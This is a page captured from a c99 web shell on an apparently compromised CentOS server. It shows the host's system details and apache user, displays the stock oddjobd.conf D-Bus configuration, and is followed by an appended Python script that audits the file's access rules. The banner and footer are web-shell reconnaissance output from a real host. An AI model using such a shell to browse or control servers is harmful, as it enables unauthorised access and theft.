!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)


Viewing file:     oddjobd.conf (4.35 KB)      -rw-r--r--
<?xml version="1.0"?>

<!-- This configuration file controls the oddjob daemon.  It controls
     which requests the daemon will recognize, and whether or not it
     will attempt to fulfill them on the behalf of particular users.

     Create and edit oddjobd-local.conf rather than changing this file
     directly.

     Each <oddjobconfig> contains a mixture of <service> and <include> nodes.
 
     Each <service> element corresponds to a well-known D-Bus address (given
     in the "name" attribute) which the oddjobd daemon will answer to.  It
     may contain one or more <object> elements which each describe an object
     path.  Each <object>, in turn, is named by its "name" attribute.

     Each <object> element must also contain zero or more <interface>
     elements, which are named by their "name" attributes and correspond to
     names of interfaces which the object implements.

     Each <interface> element must contain zero or more <method>
     elements, which are named by their "name" attributes.  Each
     <method> node corresponds to a D-Bus method implemented by the
     object as part of the interface.

     Each method must include an access-control list which contains at
     least one rule, or the daemon will ignore any attempts to call the
     method.

     When checking if a client is allowed to use a method, all deny
     rules are processed, then all allow rules.  The first rule which
     matches the user decides whether access is allowed or denied.

     Access rules can specify either a user (using the "user"
     attribute), or a range of UIDs (using the "min_uid" and "max_uid"
     attributes).

     If SELinux support was compiled in, then a rule can also specify
     whether or not it applies if the SELinux policy is being enforced
     ("selinux_enforcing"), or what the caller's SELinux context
     ("selinux_context"), user ("selinux_user"), role ("selinux_role"),
     or type ("selinux_type") must be for that rule to apply.

     A method may, as part of its definition, specify an external
     program which is to be run when the method is invoked, by including
     a <helper> node.  The <helper> node should include an "exec"
     attribute naming the external program which will be launched to
     accomplish the given task.  Depending on the value of its
     "argument_passing_method" attribute, it will receive its arguments
     either over stdin, one argument per line, or on the command line.
     Depending on the value of the "prepend_user_name" attribute, the
     argument list may or may not begin with the calling user's name.
     The helper will be run with superuser privileges.
 
     Here's what an example oddjobd-local.conf might look like:

     <service name="com.redhat.oddjob">
       <object name="/com/redhat/oddjob">
         <interface name="com.redhat.oddjob">
           <method name="mkhomedirfor">
             <allow user="root"/>
             <allow selinux_enforcing="yes" selinux_role="staff_r"/>
             <allow user="dovecot"/>
           </method>
         </interface>
       </object>

       <object name="/com/redhat/oddjob">
         <interface name="com.redhat.oddjob">
           <method name="mkmyhomedir">
             <helper exec="/usr/bin/pwd" arguments="0" prepend_user_name="no"/>
             <allow min_uid="500"/>
           </method>
         </interface>
       </object>
     </service>
  -->

<oddjobconfig>

  <service name="com.redhat.oddjob">
    <object name="/com/redhat/oddjob">
      <interface name="com.redhat.oddjob">

        <method name="list">
          <allow min_uid="0" max_uid="0"/>
        </method>

        <method name="quit">
          <allow user="root"/>
        </method>

        <method name="reload">
          <allow user="root"/>
        </method>

        <method name="reboot">
          <helper exec="/sbin/reboot" arguments="0"/>
        </method>

        <method name="mkmyhomedir">
          <helper exec="/usr/lib/oddjob/mkhomedir" arguments="0" prepend_user_name="yes"/>
          <allow user="root"/>
        </method>

        <method name="mkhomedirfor">
          <helper exec="/usr/lib/oddjob/mkhomedir" arguments="1"/>
          <allow user="root"/>
        </method>

      </interface>

    </object>

  </service>

  <include ignore_missing="yes">/etc/oddjobd.conf.d/*.conf</include>
  <include ignore_missing="yes">/etc/oddjobd-local.conf</include>

</oddjobconfig>
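
An added example (not part of the original page or of the oddjob project): a small Python audit that applies the rules described in the file's comment to each <method>, marking methods with no rule as inert and any allow rule not limited to root for review. The sample XML is constructed from the entries shown above; `local_example` is a hypothetical method modeled on the comment's sample, and treating only user="root" or min_uid=max_uid=0 as root-only is an assumption of this example.

```python
import xml.etree.ElementTree as ET

# Constructed sample: entries taken from the config above, plus one
# hypothetical method ("local_example") modeled on the comment's sample.
SAMPLE = """<oddjobconfig>
  <service name="com.redhat.oddjob">
    <object name="/com/redhat/oddjob">
      <interface name="com.redhat.oddjob">
        <method name="list"><allow min_uid="0" max_uid="0"/></method>
        <method name="reboot"><helper exec="/sbin/reboot" arguments="0"/></method>
        <method name="mkmyhomedir">
          <helper exec="/usr/lib/oddjob/mkhomedir" arguments="0" prepend_user_name="yes"/>
          <allow user="root"/>
        </method>
        <method name="local_example">
          <helper exec="/usr/bin/pwd" arguments="0" prepend_user_name="no"/>
          <allow min_uid="500"/>
        </method>
      </interface>
    </object>
  </service>
</oddjobconfig>"""


def root_only(rule):
    """Assumption: a rule is root-only if it names user root or pins the UID range to 0."""
    if "user" in rule.attrib:
        return rule.get("user") == "root"
    return rule.get("min_uid") == "0" and rule.get("max_uid") == "0"


def audit(xml_text):
    """Return (method name, status, helper exec or None) for every <method>."""
    findings = []
    for method in ET.fromstring(xml_text).iter("method"):
        helper = method.find("helper")
        allows = method.findall("allow")
        if not allows and not method.findall("deny"):
            status = "inert"    # no ACL rule: the daemon ignores calls to it
        elif not all(root_only(a) for a in allows):
            status = "review"   # an allow rule can match a non-root caller
        else:
            status = "ok"
        exe = helper.get("exec") if helper is not None else None
        findings.append((method.get("name"), status, exe))
    return findings


if __name__ == "__main__":
    for name, status, exe in audit(SAMPLE):
        print(f"{name:15} {status:7} helper={exe}")
```

The audit reads one file only; the <include> targets (/etc/oddjobd.conf.d/*.conf and /etc/oddjobd-local.conf) have to be passed through it separately.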

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--